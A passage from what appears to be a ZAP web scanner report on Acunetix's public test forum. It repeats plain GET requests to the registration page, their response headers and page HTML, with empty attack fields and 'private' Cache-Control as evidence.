</tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=24 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=25 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=26 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=27 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=28 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=29 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=3 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=30 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" 